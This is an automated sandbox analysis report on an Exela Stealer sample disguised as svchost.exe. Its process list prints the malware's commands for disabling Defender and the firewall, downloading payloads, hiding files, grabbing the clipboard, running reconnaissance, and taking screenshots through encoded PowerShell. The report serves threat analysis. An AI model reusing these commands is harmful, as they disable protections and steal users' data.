Analysis Overview
SHA256
126d168549578cad4d37c87fbe0d85f5516c0449e82f19314c5c07bace902797
Threat Level: Known bad
The file svchost.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Exelastealer family
Exela Stealer
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender DisableAntiSpyware settings
Grants admin privileges
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Clipboard Data
Unsecured Credentials: Credentials In Files
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
Network Service Discovery
UPX packed file
Hide Artifacts: Hidden Files and Directories
Enumerates processes with tasklist
Launches sc.exe
Browser Information Discovery
Detects Pyinstaller
System Network Connections Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Permission Groups Discovery: Local Groups
Unsigned PE
Gathers system information
Gathers network information
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Collects information from the system
Detects videocard installed
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-06-30 18:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-06-30 18:07
Reported
2025-06-30 18:09
Platform
win10v2004-20250610-en
Max time kernel
104s
Max time network
142s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Exela Stealer
Exelastealer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Grants admin privileges
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exela.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\no defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exela.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\ARP.EXE | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
System Network Connections Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Exela.exe
"C:\Users\Admin\AppData\Local\Temp\Exela.exe"
C:\Users\Admin\AppData\Local\Temp\no defender.exe
"C:\Users\Admin\AppData\Local\Temp\no defender.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\7D20.tmp\7D21.bat "C:\Users\Admin\AppData\Local\Temp\no defender.exe""
C:\Users\Admin\AppData\Local\Temp\Exela.exe
"C:\Users\Admin\AppData\Local\Temp\Exela.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$hwnd = Get-Process -id $pid | select -Expand MainWindowHandle; $win32 = Add-Type @'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); } '@ -PassThru; $win32::ShowWindow($hwnd, 0)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Stop-Service -Name 'WinDefend' -Force"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "gdb --version"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get Manufacturer
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get Manufacturer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\curl.exe
curl -L --silent "بتحط هنا رابط باتشك" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwB